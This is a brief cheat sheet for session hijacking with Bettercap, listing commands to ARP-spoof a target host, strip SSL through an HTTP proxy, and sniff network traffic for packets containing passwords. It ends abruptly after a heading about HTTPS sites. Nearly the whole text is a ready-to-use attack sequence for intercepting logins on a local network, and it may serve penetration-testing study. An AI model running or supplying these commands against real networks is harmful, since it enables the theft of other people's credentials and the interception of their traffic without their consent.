Session hijacking cheat sheet

Bettercap

Using Bettercap to collects all http logins used by routers, servers, and websites that do not have SSL enabled

bettercap -iface eth0
-iface: Specifies the interface to bind to.

net.probe on
This module will send different types of probe packets to each IP in the current subnet for the net.recon module to detect them.

net.recon on
The net.recon module displays the detected active IP addresses in the network. In real-time, this module will start sniffing network packets.

set http.proxy.sslstrip true
This module enables SSL stripping.

set arp.spoof.internal true
This module spoofs the local connections among computers of the internal network.

set arp.spoof.targets [Target IP]
This module spoofs the IP address of the target host.

http.proxy on
This module initiates http proxy.

arp.spoof on
This module initiates arp spoofing.

net.sniff on
This module is responsible for performing sniffing on the network.

set net.sniff.regexp '.*password=.+'
This module will only consider the packets sent with a payload matching the given regular expression (in this case, ‘.*password=.+’).

Using Bettercap to sniff network traffic from https-based websites

set http.proxy.sslstrip true